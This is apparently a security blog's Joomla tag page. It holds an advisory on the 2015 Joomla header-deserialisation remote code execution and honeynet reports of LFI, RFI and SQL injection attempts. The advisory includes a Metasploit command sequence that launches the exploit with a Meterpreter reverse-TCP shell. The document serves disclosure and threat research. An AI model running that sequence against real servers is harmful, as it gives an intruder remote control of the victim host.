Posts tagged Joomla
Vulnerability discovered exploited in the wild
Patched by the vendor the 2015-12-14
Metasploit PoC provided the 2015-12-16
PoC provided by :
Affected version(s) :
All versions of Joomla versions between 1.5.0 to 3.4.5 included.
In order to exploit this vulnerability PHP must also be vulnerable to the deserialisation vulnerability.
Tested on :
Joomla 3.4.5 on Linux ubuntu-1210 with PHP 5.4.6-1ubuntu1
Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.
use exploit/multi/http/joomla_http_header_rce set RHOST 192.168.6.143 set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.6.138 exploit sysinfo
As discussed in a previous post, Local File Inclusion (LFI) exploits are increasing. The major vector of this increasing activity is due to Joomla, his daily vulnerabilities and th e integration of LFI dorks into RFI scanners 🙂 We propose you to follow all the Joomla LFI exploits attempts on our Honey Net in real time.
In a previous post, we have seen that Joomla wgPicasa component LFI exploit was more used than other LFI exploits. I was interested to see if the source IPs of this particular LFI attack was implicated into other attacks and integrated into bigger botnets.
First of all, since the 15 April 2010, we have 165 different unique source IPs how have attempt to use the Joomla wgPicasa component LFI exploit on our HoneyNet. These source IPs have generate 20 351 events. Here under an afterglow representation of all these IPs with they weight in term of events.
Are these source IPs involved in other activities ? Surely yes 🙂 After some crazy SQL queries on our HoneyNet database, we got these results.
- 45 others exploits where detected from the same source IPs who are exploiting the Joomla wgPicasa component LFI vulnerability.
- Some of these 45 exploits are targeting others LFI exploits, for examples :
- Joomla Component com_ccnewsletter controller
- Ideal MooFAQ Joomla Component file_includer.php
- rgboard _footer.php skin_path parameter
- phpSkelSite TplSuffix parameter
- MODx CMS snippet.reflect.php reflect_base
- TBmnetCMS index.php content Parameter
- Some of these 45 exploits are targeting RFI exploits, for examples :
- ProdLer prodler.class.php sPath Parameter
- Datalife Engine api.class.php dle_config_api Parameter
- SERWeb main_prepend.php functionsdir Parameter
- Possible AIOCP cp_html2xhtmlbasic.php
- Mambo/Joomla! com_koesubmit Component ‘koesubmit.php’
- eFront database.php
- Some of these 45 exploits are trying SQL injection, for examples :
- MYSQL SELECT CONCAT SQL Injection
- SQL Injection Attempt UNION SELECT
- SQL Injection Attempt SELECT FROM
Here under an afterglow representation of the interactions between all source IPs and them attached exploits attempts.
We can clearly see that most of these source IPs are controlled by Remote File Inclusion botnets, but some of them are standalone and only exploiting the particular Joomla wgPicasa component LFI.
The 14 April 2010, Antisecurity has release a Joomla wgPicasa Component Local File Inclusion (LFI) exploit, published on Exploit Database as EDB-ID 12230. To attract the “bad guys” how will use this exploit, we published the 15 April a news containing, in the URL and the content of the news, some keywords to be the more attractive as possible 🙂 Most of the LFI scanners are using Google dorking methods to find a potential vulnerable target. So let get a good position in Google ranking.
Since the 15 April, we can see that this particular exploit is more targeted than other Local File Inclusion exploits, and the number of events are still increasing until we are one month after the exploit publication.
Also, we have some source IP how are really trying to get in 🙂
So, just one word, Joomla wgPicasa is in the hype, and really if you use Joomla, shutdown your server 🙂